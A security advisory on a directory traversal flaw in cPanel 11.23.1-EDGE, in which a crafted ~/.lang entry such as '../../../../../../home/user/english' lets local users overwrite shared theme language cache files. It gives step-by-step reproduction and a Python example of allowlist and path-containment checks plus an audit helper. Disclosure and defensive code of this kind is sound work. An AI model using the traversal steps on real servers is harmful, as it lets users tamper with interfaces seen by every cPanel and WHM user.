cPanel 11.23.1-EDGE_24268 - local users cache files overwrite



DESCRIPTION


Non-reseller users could use directory traversal in ~/.lang to overwrite the cPanel theme language cache files stored under /var/cpanel/lang.cache/theme/.

First, the user needed to create a file in their home directory with the name of a valid theme on the box, such as /home/username/english:

[user@host ~]$ touch english

Second, the user needed to create an entry containing a valid theme name in ~/.lang:

../../../../../../home/user/english


Next, the user needed to send any valid request to cpsrvd (e.g., GET /frontend/x3/index.html HTTP/1.1). Once the request had been made, the following files would be overwritten with the contents of /home/username/english:

/var/cpanel/lang.cache/theme/x3/english.cache
/var/cpanel/lang.cache/theme/x3mail/english.cache
/var/cpanel/lang.cache/theme/x/english.cache
/var/cpanel/lang.cache/theme/tree/english.cache
/var/cpanel/lang.cache/theme/default/english.cache
/var/cpanel/lang.cache/theme/iconic/english.cache
/var/cpanel/lang.cache/theme/advanced/english.cache
/var/cpanel/lang.cache/theme/y/english.cache
/var/cpanel/lang.cache/theme/NO/english.cache
/var/cpanel/lang.cache/theme/YES/english.cache
/var/cpanel/lang.cache/english.cache
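The root cause is that a user-controlled value from ~/.lang was joined into a filesystem path without being restricted to a single, known name. The following is an added example (not cPanel's own code, which is Perl; Python is used here only to make the check runnable) of the two checks a defender wants before such a value touches the filesystem: an allowlist and single-path-component check on the name, and a second check that the resolved path still lies below the cache root. It also includes an audit helper an administrator could run over the contents of users' ~/.lang files to spot entries that contain path separators or traversal sequences. The cache root and theme names come from the advisory above; the language allowlist and the sample ~/.lang lines are constructed for the example.

```python
import posixpath
import re
from typing import List, Optional

# Directory named in the advisory as the target of the overwrite.
LANG_CACHE_ROOT = "/var/cpanel/lang.cache"

# Assumed allowlist of language names. On a real server this would be
# derived from the language files actually installed; the values are constructed.
KNOWN_LANGUAGES = {"english", "spanish", "german"}

# A language name must be exactly one path component: letters, digits, '_' or '-'.
# This rejects '/', '..', NUL bytes, whitespace and the empty string outright.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_lang_entry(entry: str) -> Optional[str]:
    """Return the language name if one line of ~/.lang is acceptable, else None."""
    name = entry.strip()
    if not _SAFE_NAME.fullmatch(name):
        return None          # contains a separator, traversal or other junk
    if name not in KNOWN_LANGUAGES:
        return None          # only names the server ships may select a cache file
    return name


def cache_path_for(theme: str, entry: str) -> Optional[str]:
    """Compute the cache file a request for `theme` would use, or None if unsafe."""
    name = validate_lang_entry(entry)
    if name is None or not _SAFE_NAME.fullmatch(theme):
        return None
    root = posixpath.join(LANG_CACHE_ROOT, "theme", theme)
    candidate = posixpath.normpath(posixpath.join(root, name + ".cache"))
    # Second line of defence: even a validated name must resolve below the root.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def audit_lang_lines(lines: List[str]) -> List[str]:
    """Return the lines of a ~/.lang file that would be rejected by validation.

    Intended for an administrator sweeping user home directories: any line
    returned here is either not a known language or not a plain name.
    """
    return [line for line in lines if validate_lang_entry(line) is None]


if __name__ == "__main__":
    # Constructed sample ~/.lang contents: one legitimate line and one that
    # uses the traversal pattern described in the advisory.
    sample = ["english", "../../../../../../home/user/english"]
    print("rejected entries:", audit_lang_lines(sample))
    print("x3 cache path for 'english':", cache_path_for("x3", "english"))
```

Both checks are kept even though the allowlist alone would block the traversal entry: if the allowlist is ever loaded from a writable location, or a name with a separator slips into it, the path containment check still refuses to write outside the cache root.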



IMPACT


Local users could overwrite theme files, affecting everyone logging into cPanel or WHM.